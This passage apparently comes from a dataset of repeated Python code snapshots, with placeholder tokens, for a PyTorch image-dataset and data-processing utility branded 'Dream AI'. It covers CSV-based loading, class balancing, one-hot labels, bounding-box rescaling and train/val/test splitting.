bb\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(path):\n with open(path, 'rb') as f:\n return pickle.load(f)\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\ndef add_extension(a, e):\n a = [(x + e) for x in a]\n return a\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\ndef get_index(arr, a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return bb\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, 